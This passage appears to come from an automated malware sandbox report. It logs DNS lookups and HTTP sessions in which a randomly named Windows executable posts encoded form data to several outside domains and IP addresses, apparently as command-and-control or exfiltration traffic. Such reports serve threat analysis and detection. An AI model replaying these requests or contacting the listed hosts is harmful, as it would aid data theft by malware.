                Jul 4, 2024 12:37:33.367268085 CEST6063980192.168.2.4162.0.236.122
                Jul 4, 2024 12:37:33.372241020 CEST8060639162.0.236.122192.168.2.4
                Jul 4, 2024 12:37:33.375478983 CEST6063980192.168.2.4162.0.236.122
                Jul 4, 2024 12:37:33.379559040 CEST6063980192.168.2.4162.0.236.122
                Jul 4, 2024 12:37:33.380629063 CEST8060639162.0.236.122192.168.2.4
                Jul 4, 2024 12:37:33.383496046 CEST6063980192.168.2.4162.0.236.122
                Jul 4, 2024 12:37:33.384501934 CEST8060639162.0.236.122192.168.2.4
                Jul 4, 2024 12:37:33.384533882 CEST6063980192.168.2.4162.0.236.122
                Jul 4, 2024 12:37:33.388976097 CEST8060639162.0.236.122192.168.2.4
                Jul 4, 2024 12:37:33.389605045 CEST8060639162.0.236.122192.168.2.4
                Jul 4, 2024 12:37:46.693720102 CEST6064080192.168.2.452.1.217.30
                Jul 4, 2024 12:37:46.699496984 CEST806064052.1.217.30192.168.2.4
                Jul 4, 2024 12:37:46.699563026 CEST6064080192.168.2.452.1.217.30
                Jul 4, 2024 12:37:46.701988935 CEST6064080192.168.2.452.1.217.30
                Jul 4, 2024 12:37:46.708539963 CEST806064052.1.217.30192.168.2.4
                Jul 4, 2024 12:37:47.336909056 CEST806064052.1.217.30192.168.2.4
                Jul 4, 2024 12:37:47.336925030 CEST806064052.1.217.30192.168.2.4
                Jul 4, 2024 12:37:47.337022066 CEST806064052.1.217.30192.168.2.4
                Jul 4, 2024 12:37:47.342087030 CEST6064080192.168.2.452.1.217.30
                Jul 4, 2024 12:37:48.206032991 CEST6064080192.168.2.452.1.217.30
                Jul 4, 2024 12:37:49.246087074 CEST6064180192.168.2.452.1.217.30
                Jul 4, 2024 12:37:49.251662016 CEST806064152.1.217.30192.168.2.4
                Jul 4, 2024 12:37:49.265901089 CEST6064180192.168.2.452.1.217.30
                Jul 4, 2024 12:37:49.265901089 CEST6064180192.168.2.452.1.217.30
                Jul 4, 2024 12:37:49.272669077 CEST806064152.1.217.30192.168.2.4
                Jul 4, 2024 12:37:49.276375055 CEST806064152.1.217.30192.168.2.4
                Jul 4, 2024 12:37:51.786958933 CEST6064280192.168.2.452.1.217.30
                Jul 4, 2024 12:37:51.792113066 CEST806064252.1.217.30192.168.2.4
                Jul 4, 2024 12:37:51.792850971 CEST6064280192.168.2.452.1.217.30
                Jul 4, 2024 12:37:51.838017941 CEST6064280192.168.2.452.1.217.30
                Jul 4, 2024 12:37:51.843605995 CEST806064252.1.217.30192.168.2.4
                Jul 4, 2024 12:37:51.843622923 CEST806064252.1.217.30192.168.2.4
                Jul 4, 2024 12:37:51.843631983 CEST806064252.1.217.30192.168.2.4
                Jul 4, 2024 12:37:51.843638897 CEST806064252.1.217.30192.168.2.4
                Jul 4, 2024 12:37:51.843703985 CEST806064252.1.217.30192.168.2.4
                Jul 4, 2024 12:37:51.843739033 CEST806064252.1.217.30192.168.2.4
                Jul 4, 2024 12:37:51.843746901 CEST806064252.1.217.30192.168.2.4
                Jul 4, 2024 12:37:51.843755007 CEST806064252.1.217.30192.168.2.4
                Jul 4, 2024 12:37:51.843765020 CEST806064252.1.217.30192.168.2.4
                Jul 4, 2024 12:37:52.321455956 CEST806064252.1.217.30192.168.2.4
                Jul 4, 2024 12:37:52.322978020 CEST806064252.1.217.30192.168.2.4
                Jul 4, 2024 12:37:52.322987080 CEST806064252.1.217.30192.168.2.4
                Jul 4, 2024 12:37:52.323041916 CEST6064280192.168.2.452.1.217.30
                Jul 4, 2024 12:37:53.706108093 CEST6064280192.168.2.452.1.217.30
                Jul 4, 2024 12:37:54.724347115 CEST6064380192.168.2.452.1.217.30
                Jul 4, 2024 12:37:54.729285955 CEST806064352.1.217.30192.168.2.4
                Jul 4, 2024 12:37:54.729377985 CEST6064380192.168.2.452.1.217.30
                Jul 4, 2024 12:37:54.731409073 CEST6064380192.168.2.452.1.217.30
                Jul 4, 2024 12:37:54.738971949 CEST806064352.1.217.30192.168.2.4
                Jul 4, 2024 12:37:55.226159096 CEST806064352.1.217.30192.168.2.4
                Jul 4, 2024 12:37:55.226176977 CEST806064352.1.217.30192.168.2.4
                Jul 4, 2024 12:37:55.226188898 CEST806064352.1.217.30192.168.2.4
                Jul 4, 2024 12:37:55.226201057 CEST806064352.1.217.30192.168.2.4
                Jul 4, 2024 12:37:55.226255894 CEST806064352.1.217.30192.168.2.4
                Jul 4, 2024 12:37:55.226536989 CEST6064380192.168.2.452.1.217.30
                Jul 4, 2024 12:37:55.226536989 CEST6064380192.168.2.452.1.217.30
                Jul 4, 2024 12:37:55.255155087 CEST6064380192.168.2.452.1.217.30
                Jul 4, 2024 12:37:55.262550116 CEST806064352.1.217.30192.168.2.4

                UDP Packets

                TimestampSource PortDest PortSource IPDest IP
                Jul 4, 2024 12:35:33.200686932 CEST5360169162.159.36.2192.168.2.4
                Jul 4, 2024 12:35:33.711960077 CEST53562301.1.1.1192.168.2.4
                Jul 4, 2024 12:35:54.950790882 CEST4941453192.168.2.41.1.1.1
                Jul 4, 2024 12:35:54.997040033 CEST53494141.1.1.1192.168.2.4
                Jul 4, 2024 12:36:10.603106022 CEST4921553192.168.2.41.1.1.1
                Jul 4, 2024 12:36:10.619098902 CEST53492151.1.1.1192.168.2.4
                Jul 4, 2024 12:36:23.756087065 CEST6436053192.168.2.41.1.1.1
                Jul 4, 2024 12:36:24.104461908 CEST53643601.1.1.1192.168.2.4
                Jul 4, 2024 12:36:58.132101059 CEST5323553192.168.2.41.1.1.1
                Jul 4, 2024 12:36:59.128371000 CEST5323553192.168.2.41.1.1.1
                Jul 4, 2024 12:36:59.238598108 CEST53532351.1.1.1192.168.2.4
                Jul 4, 2024 12:36:59.238607883 CEST53532351.1.1.1192.168.2.4
                Jul 4, 2024 12:37:12.881185055 CEST5311953192.168.2.41.1.1.1
                Jul 4, 2024 12:37:13.021629095 CEST53531191.1.1.1192.168.2.4
                Jul 4, 2024 12:37:25.681261063 CEST5813653192.168.2.41.1.1.1
                Jul 4, 2024 12:37:25.711230993 CEST53581361.1.1.1192.168.2.4
                Jul 4, 2024 12:37:38.397314072 CEST6070953192.168.2.41.1.1.1
                Jul 4, 2024 12:37:38.409378052 CEST53607091.1.1.1192.168.2.4
                Jul 4, 2024 12:37:46.476336002 CEST5386153192.168.2.41.1.1.1
                Jul 4, 2024 12:37:46.690951109 CEST53538611.1.1.1192.168.2.4
                Jul 4, 2024 12:38:00.240856886 CEST5023453192.168.2.41.1.1.1
                Jul 4, 2024 12:38:00.712979078 CEST53502341.1.1.1192.168.2.4

                DNS Queries

                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                Jul 4, 2024 12:35:54.950790882 CEST192.168.2.41.1.1.10xa14cStandard query (0)www.enrich-pet.comA (IP address)IN (0x0001)false
                Jul 4, 2024 12:36:10.603106022 CEST192.168.2.41.1.1.10x1a16Standard query (0)www.alanbeanart.comA (IP address)IN (0x0001)false
                Jul 4, 2024 12:36:23.756087065 CEST192.168.2.41.1.1.10x9197Standard query (0)www.qaronvc.lolA (IP address)IN (0x0001)false
                Jul 4, 2024 12:36:58.132101059 CEST192.168.2.41.1.1.10xf70eStandard query (0)www.piqia.topA (IP address)IN (0x0001)false
                Jul 4, 2024 12:36:59.128371000 CEST192.168.2.41.1.1.10xf70eStandard query (0)www.piqia.topA (IP address)IN (0x0001)false
                Jul 4, 2024 12:37:12.881185055 CEST192.168.2.41.1.1.10x8931Standard query (0)www.cheapdesklamp.shopA (IP address)IN (0x0001)false
                Jul 4, 2024 12:37:25.681261063 CEST192.168.2.41.1.1.10xb0c5Standard query (0)www.tofcomy.xyzA (IP address)IN (0x0001)false
                Jul 4, 2024 12:37:38.397314072 CEST192.168.2.41.1.1.10x72a5Standard query (0)www.wepayassessments.comA (IP address)IN (0x0001)false
                Jul 4, 2024 12:37:46.476336002 CEST192.168.2.41.1.1.10xfff9Standard query (0)www.wwfglobal.comA (IP address)IN (0x0001)false
                Jul 4, 2024 12:38:00.240856886 CEST192.168.2.41.1.1.10xfb54Standard query (0)www.chefmikesrecipes.comA (IP address)IN (0x0001)false

                DNS Answers

                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                Jul 4, 2024 12:35:54.997040033 CEST1.1.1.1192.168.2.40xa14cNo error (0)www.enrich-pet.comcdn1.wixdns.netCNAME (Canonical name)IN (0x0001)false
                Jul 4, 2024 12:35:54.997040033 CEST1.1.1.1192.168.2.40xa14cNo error (0)cdn1.wixdns.nettd-ccm-neg-87-45.wixdns.netCNAME (Canonical name)IN (0x0001)false
                Jul 4, 2024 12:35:54.997040033 CEST1.1.1.1192.168.2.40xa14cNo error (0)td-ccm-neg-87-45.wixdns.net34.149.87.45A (IP address)IN (0x0001)false
                Jul 4, 2024 12:36:10.619098902 CEST1.1.1.1192.168.2.40x1a16No error (0)www.alanbeanart.comalanbeanart.comCNAME (Canonical name)IN (0x0001)false
                Jul 4, 2024 12:36:10.619098902 CEST1.1.1.1192.168.2.40x1a16No error (0)alanbeanart.com3.33.130.190A (IP address)IN (0x0001)false
                Jul 4, 2024 12:36:10.619098902 CEST1.1.1.1192.168.2.40x1a16No error (0)alanbeanart.com15.197.148.33A (IP address)IN (0x0001)false
                Jul 4, 2024 12:36:24.104461908 CEST1.1.1.1192.168.2.40x9197No error (0)www.qaronvc.lol116.213.43.190A (IP address)IN (0x0001)false
                Jul 4, 2024 12:36:59.238598108 CEST1.1.1.1192.168.2.40xf70eNo error (0)www.piqia.top172.80.82.186A (IP address)IN (0x0001)false
                Jul 4, 2024 12:36:59.238607883 CEST1.1.1.1192.168.2.40xf70eNo error (0)www.piqia.top172.80.82.186A (IP address)IN (0x0001)false
                Jul 4, 2024 12:37:13.021629095 CEST1.1.1.1192.168.2.40x8931No error (0)www.cheapdesklamp.shop194.195.220.41A (IP address)IN (0x0001)false
                Jul 4, 2024 12:37:25.711230993 CEST1.1.1.1192.168.2.40xb0c5No error (0)www.tofcomy.xyz162.0.236.122A (IP address)IN (0x0001)false
                Jul 4, 2024 12:37:38.409378052 CEST1.1.1.1192.168.2.40x72a5Name error (3)www.wepayassessments.comnonenoneA (IP address)IN (0x0001)false
                Jul 4, 2024 12:37:46.690951109 CEST1.1.1.1192.168.2.40xfff9No error (0)www.wwfglobal.comdomain.enagicwebsystem.comCNAME (Canonical name)IN (0x0001)false
                Jul 4, 2024 12:37:46.690951109 CEST1.1.1.1192.168.2.40xfff9No error (0)domain.enagicwebsystem.comenagicwebsystem.comCNAME (Canonical name)IN (0x0001)false
                Jul 4, 2024 12:37:46.690951109 CEST1.1.1.1192.168.2.40xfff9No error (0)enagicwebsystem.com52.1.217.30A (IP address)IN (0x0001)false
                Jul 4, 2024 12:38:00.712979078 CEST1.1.1.1192.168.2.40xfb54No error (0)www.chefmikesrecipes.comchefmikesrecipes.comCNAME (Canonical name)IN (0x0001)false
                Jul 4, 2024 12:38:00.712979078 CEST1.1.1.1192.168.2.40xfb54No error (0)chefmikesrecipes.com23.226.70.194A (IP address)IN (0x0001)false

                HTTP Request Dependency Graph

                • www.enrich-pet.com
                • www.alanbeanart.com
                • www.qaronvc.lol
                • www.piqia.top
                • www.cheapdesklamp.shop
                • www.tofcomy.xyz
                • www.wwfglobal.com

                HTTP Packets

                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                0192.168.2.46061934.149.87.45802032C:\Program Files (x86)\PGIzXOBshIiSnGcNkZxrkfaOPtrgbMvqBOSRsBsN\AbWHWpocGREf.exe
                TimestampBytes transferredDirectionData
                Jul 4, 2024 12:35:55.019984961 CEST491OUTGET /qrvt/?LtQxGF=HKECkscmwzLra6NzkhZq3iBCIkzhkrvRsiPWEPVOhy8HPvsuERt4M3iNy9vRPczT41Pma1tHEzPhIwEcWnI00ZdIodjuVJj7fI0Qa0rGd4Hyi3029DaEicY=&tDVH=AxaL HTTP/1.1
                Host: www.enrich-pet.com
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-US
                Connection: close
                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                Jul 4, 2024 12:35:55.523375034 CEST528INHTTP/1.1 301 Moved Permanently
                Content-Length: 0
                Location: https://www.enrich-pet.com/qrvt/?LtQxGF=HKECkscmwzLra6NzkhZq3iBCIkzhkrvRsiPWEPVOhy8HPvsuERt4M3iNy9vRPczT41Pma1tHEzPhIwEcWnI00ZdIodjuVJj7fI0Qa0rGd4Hyi3029DaEicY=&tDVH=AxaL
                Accept-Ranges: bytes
                Date: Thu, 04 Jul 2024 10:35:55 GMT
                X-Served-By: cache-iad-kcgs7200045-IAD
                X-Cache: MISS
                X-Seen-By: yvSunuo/8ld62ehjr5B7kA==,VtqAe8Wu9wvSsl49B/X4+ewfbs+7qUVAqsIx00yI78k=
                Via: 1.1 google
                glb-x-seen-by: bS8wRlGzu0Hc+WrYuHB8QIg44yfcdCMJRkBoQ1h6Vjc=
                Connection: close


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                1192.168.2.4606203.33.130.190802032C:\Program Files (x86)\PGIzXOBshIiSnGcNkZxrkfaOPtrgbMvqBOSRsBsN\AbWHWpocGREf.exe
                TimestampBytes transferredDirectionData
                Jul 4, 2024 12:36:10.661734104 CEST768OUTPOST /jdip/ HTTP/1.1
                Host: www.alanbeanart.com
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-US
                Accept-Encoding: gzip, deflate, br
                Origin: http://www.alanbeanart.com
                Connection: close
                Content-Length: 203
                Content-Type: application/x-www-form-urlencoded
                Cache-Control: no-cache
                Referer: http://www.alanbeanart.com/jdip/
                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                Data Raw: 4c 74 51 78 47 46 3d 62 30 79 34 68 63 6a 54 51 4e 42 54 46 50 4c 72 33 63 4b 50 73 48 61 62 78 39 59 52 37 65 38 62 59 30 6b 4d 57 6c 45 43 59 37 34 69 47 65 48 50 4c 31 4a 49 6e 53 2b 36 73 79 56 6c 62 6f 35 58 49 50 57 34 48 54 38 59 61 45 64 42 47 47 54 51 67 77 62 68 6d 44 51 41 30 56 51 42 6f 31 46 70 6b 57 72 64 56 44 4f 49 43 4b 57 58 33 69 45 77 2f 6c 62 6b 6c 74 61 50 34 63 63 52 57 73 67 56 43 6f 45 47 53 33 43 57 48 47 47 32 37 32 73 36 41 55 39 57 38 36 52 71 6b 76 46 36 46 4e 6a 46 64 73 71 37 47 42 32 71 38 6f 2f 42 45 64 76 71 6f 50 35 79 2b 4b 59 34 70 46 52 54 73 61 47 57 4e 77 3d 3d
                Data Ascii: LtQxGF=b0y4hcjTQNBTFPLr3cKPsHabx9YR7e8bY0kMWlECY74iGeHPL1JInS+6syVlbo5XIPW4HT8YaEdBGGTQgwbhmDQA0VQBo1FpkWrdVDOICKWX3iEw/lbkltaP4ccRWsgVCoEGS3CWHGG272s6AU9W86RqkvF6FNjFdsq7GB2q8o/BEdvqoP5y+KY4pFRTsaGWNw==


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                2192.168.2.4606213.33.130.190802032C:\Program Files (x86)\PGIzXOBshIiSnGcNkZxrkfaOPtrgbMvqBOSRsBsN\AbWHWpocGREf.exe
                TimestampBytes transferredDirectionData
                Jul 4, 2024 12:36:13.202755928 CEST788OUTPOST /jdip/ HTTP/1.1
                Host: www.alanbeanart.com
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-US
                Accept-Encoding: gzip, deflate, br
                Origin: http://www.alanbeanart.com
                Connection: close
                Content-Length: 223
                Content-Type: application/x-www-form-urlencoded
                Cache-Control: no-cache
                Referer: http://www.alanbeanart.com/jdip/
                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                Data Raw: 4c 74 51 78 47 46 3d 62 30 79 34 68 63 6a 54 51 4e 42 54 45 75 37 72 31 37 32 50 71 6e 61 59 73 4e 59 52 31 4f 38 66 59 30 6f 4d 57 67 6c 48 59 49 63 69 47 37 44 50 4b 30 4a 49 6d 53 2b 36 6e 53 56 73 59 59 35 65 49 50 61 61 48 52 6f 59 61 45 68 42 47 47 6a 51 67 6a 7a 69 33 44 51 65 74 6c 51 44 69 56 46 70 6b 57 72 64 56 44 62 6a 43 4a 6d 58 33 54 30 77 74 51 6e 6e 37 39 61 4d 2f 63 63 52 53 73 67 52 43 6f 45 77 53 7a 43 77 48 44 61 32 37 33 38 36 41 48 6b 41 76 61 51 68 37 66 45 73 4a 63 44 4e 46 70 6e 30 5a 6a 75 4f 68 73 50 51 4d 37 2b 77 35 2b 59 6c 73 4b 38 4c 30 43 59 6e 68 5a 37 66 57 2b 6a 48 2b 6a 67 54 7a 2f 65 36 78 45 73 6a 66 6c 49 4e 73 2b 77 3d
                Data Ascii: LtQxGF=b0y4hcjTQNBTEu7r172PqnaYsNYR1O8fY0oMWglHYIciG7DPK0JImS+6nSVsYY5eIPaaHRoYaEhBGGjQgjzi3DQetlQDiVFpkWrdVDbjCJmX3T0wtQnn79aM/ccRSsgRCoEwSzCwHDa27386AHkAvaQh7fEsJcDNFpn0ZjuOhsPQM7+w5+YlsK8L0CYnhZ7fW+jH+jgTz/e6xEsjflINs+w=


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                3192.168.2.4606223.33.130.190802032C:\Program Files (x86)\PGIzXOBshIiSnGcNkZxrkfaOPtrgbMvqBOSRsBsN\AbWHWpocGREf.exe
                TimestampBytes transferredDirectionData
                Jul 4, 2024 12:36:15.732542992 CEST10870OUTPOST /jdip/ HTTP/1.1
                Host: www.alanbeanart.com
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-US
                Accept-Encoding: gzip, deflate, br
                Origin: http://www.alanbeanart.com
                Connection: close
                Content-Length: 10303
                Content-Type: application/x-www-form-urlencoded
                Cache-Control: no-cache
                Referer: http://www.alanbeanart.com/jdip/
                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                Data Raw: 4c 74 51 78 47 46 3d 62 30 79 34 68 63 6a 54 51 4e 42 54 45 75 37 72 31 37 32 50 71 6e 61 59 73 4e 59 52 31 4f 38 66 59 30 6f 4d 57 67 6c 48 59 49 55 69 47 4e 2f 50 4c 58 68 49 30 43 2b 36 35 69 56 70 59 59 34 4f 49 4d 71 65 48 52 6b 69 61 42 74 42 48 6c 62 51 77 43 7a 69 2b 44 51 65 6c 46 51 47 6f 31 46 5a 6b 57 37 6a 56 44 4c 6a 43 4a 6d 58 33 52 73 77 75 46 62 6e 35 39 61 50 34 63 63 46 57 73 67 31 43 73 6f 67 53 7a 4f 47 47 33 57 32 37 57 4d 36 4d 55 41 41 73 36 51 6a 34 66 45 6b 4a 63 4f 54 46 70 54 57 5a 69 61 77 68 72 2f 51 4a 4e 44 79 68 64 38 42 39 4a 6b 30 6b 7a 45 76 74 4a 2f 38 66 4f 7a 49 2f 41 4d 73 7a 38 58 54 36 55 42 38 4e 45 45 62 34 6f 79 4f 54 6f 56 74 5a 67 73 33 30 6c 46 41 65 42 75 52 79 79 73 54 39 5a 30 35 75 66 77 49 42 6d 36 2f 37 63 75 44 6d 73 50 64 67 61 57 44 79 35 4f 64 6d 2f 6f 7a 6a 79 6d 4c 64 61 68 6b 39 5a 51 47 45 6f 41 59 34 41 48 77 78 7a 43 52 65 61 75 48 6c 69 65 77 2f 72 76 48 4f 36 37 4e 44 4f 42 2b 4a 7a 72 35 47 4f 49 4e 76 45 38 66 4d 74 69 55 7a 76 4c [TRUNCATED]
                Data Ascii: LtQxGF=b0y4hcjTQNBTEu7r172PqnaYsNYR1O8fY0oMWglHYIUiGN/PLXhI0C+65iVpYY4OIMqeHRkiaBtBHlbQwCzi+DQelFQGo1FZkW7jVDLjCJmX3RswuFbn59aP4ccFWsg1CsogSzOGG3W27WM6MUAAs6Qj4fEkJcOTFpTWZiawhr/QJNDyhd8B9Jk0kzEvtJ/8fOzI/AMsz8XT6UB8NEEb4oyOToVtZgs30lFAeBuRyysT9Z05ufwIBm6/7cuDmsPdgaWDy5Odm/ozjymLdahk9ZQGEoAY4AHwxzCReauHliew/rvHO67NDOB+Jzr5GOINvE8fMtiUzvLH0fxnDyIH4DOJWovdjzTu5k9BVZbfaLklmzuk6n2boP5D5FvrgeAZELO4dnAdOkVHI3Lxitogxo05Uz51uVvOwKYi7zCi+kEIBG9dcxOY+tHR6gq4k88HEU7vcWhAyJKrGIVnOOY3Y8lBdwedZnSgB0zLFdhmsHrxP76MP9GJZnfmmS9r6Ehb60txGg1jV115zjaqNcYB11ZEXvB2Qsx87terf8kXVIo3ifX568EFmshF3Wd/n6bm3AtPAsUgVbD2ThhR371HUZ9eWI1VPTNT+Z5fzQqwQSR6YQs3xWj+yr9YrEEKVMQA+FnbvcII2xYcytj4TTkMmqYpzwg0sFn9OmaKc/FhXPpKZOHVsRz4mXFztyHH+cXznwbZLWorOIAkzp1VWG1ensNfJ6G/JhVBMDPktg9Y/DGnutvEh7gpTeSsbxjY+i8HUrfxp/i6z2Z+XMXUZoDmdu8lSkd/RYThyPBBd4mX5lvg0JUi2SAYcdcpjfSvg57rZFpzxU6RV3c374lVD1NIqe9+xnoLIGP4gHF5kTh/gw0/CV4gNi7x0dU+QnxuzaiwrJiNTE1JaN2hcFsTxtLE55356as41DrCH3UXtGIjmdScX1/UerkmfooHSY7nPZSe4U4SzgRBVFmARJw/KI6jTv96w+076DgczNxt8qIx3rLUa [TRUNCATED]


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                4192.168.2.4606233.33.130.190802032C:\Program Files (x86)\PGIzXOBshIiSnGcNkZxrkfaOPtrgbMvqBOSRsBsN\AbWHWpocGREf.exe
                TimestampBytes transferredDirectionData
                Jul 4, 2024 12:36:18.264786005 CEST492OUTGET /jdip/?LtQxGF=W2aYirCPXKJiAM+1zI/AgBHM8/N+99M0G00tOgURX8ZkKPjyDhoW8AacjBkWD6QeLNKPcx0xYFVxMGjx+jrAzlAoi3E+4FlvpErxWC7md5KahWwglUqmq9c=&tDVH=AxaL HTTP/1.1
                Host: www.alanbeanart.com
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-US
                Connection: close
                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                Jul 4, 2024 12:36:18.735172033 CEST392INHTTP/1.1 200 OK
                Server: openresty
                Date: Thu, 04 Jul 2024 10:36:18 GMT
                Content-Type: text/html
                Content-Length: 252
                Connection: close
                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 4c 74 51 78 47 46 3d 57 32 61 59 69 72 43 50 58 4b 4a 69 41 4d 2b 31 7a 49 2f 41 67 42 48 4d 38 2f 4e 2b 39 39 4d 30 47 30 30 74 4f 67 55 52 58 38 5a 6b 4b 50 6a 79 44 68 6f 57 38 41 61 63 6a 42 6b 57 44 36 51 65 4c 4e 4b 50 63 78 30 78 59 46 56 78 4d 47 6a 78 2b 6a 72 41 7a 6c 41 6f 69 33 45 2b 34 46 6c 76 70 45 72 78 57 43 37 6d 64 35 4b 61 68 57 77 67 6c 55 71 6d 71 39 63 3d 26 74 44 56 48 3d 41 78 61 4c 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?LtQxGF=W2aYirCPXKJiAM+1zI/AgBHM8/N+99M0G00tOgURX8ZkKPjyDhoW8AacjBkWD6QeLNKPcx0xYFVxMGjx+jrAzlAoi3E+4FlvpErxWC7md5KahWwglUqmq9c=&tDVH=AxaL"}</script></head></html>


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                5192.168.2.460624116.213.43.190802032C:\Program Files (x86)\PGIzXOBshIiSnGcNkZxrkfaOPtrgbMvqBOSRsBsN\AbWHWpocGREf.exe
                TimestampBytes transferredDirectionData
                Jul 4, 2024 12:36:24.114075899 CEST756OUTPOST /d8kh/ HTTP/1.1
                Host: www.qaronvc.lol
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-US
                Accept-Encoding: gzip, deflate, br
                Origin: http://www.qaronvc.lol
                Connection: close
                Content-Length: 203
                Content-Type: application/x-www-form-urlencoded
                Cache-Control: no-cache
                Referer: http://www.qaronvc.lol/d8kh/
                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                Data Raw: 4c 74 51 78 47 46 3d 4f 68 56 4d 37 61 73 68 58 31 50 62 70 56 6e 78 7a 6b 68 67 43 56 34 4b 30 70 43 46 59 76 34 43 51 39 4c 6b 77 69 6e 47 72 2f 50 32 50 54 6b 41 33 6a 62 45 63 30 67 2f 33 73 48 7a 79 71 34 67 72 4e 2f 64 74 30 49 55 4c 6d 71 41 33 33 37 31 57 32 35 30 47 7a 75 58 39 74 54 7a 2f 78 75 34 5a 65 50 62 4b 57 50 43 33 51 52 72 56 34 38 77 50 65 6c 6e 34 50 66 42 4c 38 77 64 47 51 2b 6b 51 78 31 2f 4e 66 47 68 78 73 33 52 66 56 77 79 35 62 69 33 35 33 2b 6d 4e 71 4e 41 56 4b 4d 49 70 4a 6f 31 6d 47 79 43 34 46 66 71 6f 55 7a 2b 6e 38 54 58 4b 41 63 45 61 6e 71 63 35 4c 7a 35 59 41 3d 3d
                Data Ascii: LtQxGF=OhVM7ashX1PbpVnxzkhgCV4K0pCFYv4CQ9LkwinGr/P2PTkA3jbEc0g/3sHzyq4grN/dt0IULmqA3371W250GzuX9tTz/xu4ZePbKWPC3QRrV48wPeln4PfBL8wdGQ+kQx1/NfGhxs3RfVwy5bi353+mNqNAVKMIpJo1mGyC4FfqoUz+n8TXKAcEanqc5Lz5YA==


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                6192.168.2.460625116.213.43.190802032C:\Program Files (x86)\PGIzXOBshIiSnGcNkZxrkfaOPtrgbMvqBOSRsBsN\AbWHWpocGREf.exe
                TimestampBytes transferredDirectionData
                Jul 4, 2024 12:36:26.653593063 CEST776OUTPOST /d8kh/ HTTP/1.1
                Host: www.qaronvc.lol
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-US
                Accept-Encoding: gzip, deflate, br
                Origin: http://www.qaronvc.lol
                Connection: close
                Content-Length: 223
                Content-Type: application/x-www-form-urlencoded
                Cache-Control: no-cache
                Referer: http://www.qaronvc.lol/d8kh/
                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                Data Raw: 4c 74 51 78 47 46 3d 4f 68 56 4d 37 61 73 68 58 31 50 62 70 31 33 78 77 48 4a 67 46 31 34 4a 78 70 43 46 53 50 34 4f 51 39 33 6b 77 6e 48 76 72 4b 66 32 4f 32 59 41 35 48 48 45 64 30 67 2f 38 4d 48 32 74 61 34 64 72 4e 6a 6a 74 30 6b 55 4c 67 47 41 33 7a 2f 31 56 42 56 33 48 6a 75 56 6d 64 54 31 67 42 75 34 5a 65 50 62 4b 57 72 6f 33 52 31 72 55 4a 4d 77 4e 2f 6c 6b 6d 2f 66 43 43 63 77 64 43 51 2f 4d 51 78 30 61 4e 63 44 4d 78 75 2f 52 66 58 6f 79 34 4b 69 30 33 33 2f 4d 4a 71 4d 69 61 49 39 32 78 35 49 2b 67 6d 53 31 2f 31 58 75 6b 79 69 6b 32 4e 79 41 59 41 34 33 48 67 6a 6f 30 49 4f 77 44 4d 6b 52 44 45 36 41 79 7a 6a 6a 2b 78 78 4c 59 6c 4c 39 48 36 73 3d
                Data Ascii: LtQxGF=OhVM7ashX1Pbp13xwHJgF14JxpCFSP4OQ93kwnHvrKf2O2YA5HHEd0g/8MH2ta4drNjjt0kULgGA3z/1VBV3HjuVmdT1gBu4ZePbKWro3R1rUJMwN/lkm/fCCcwdCQ/MQx0aNcDMxu/RfXoy4Ki033/MJqMiaI92x5I+gmS1/1Xukyik2NyAYA43Hgjo0IOwDMkRDE6Ayzjj+xxLYlL9H6s=


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
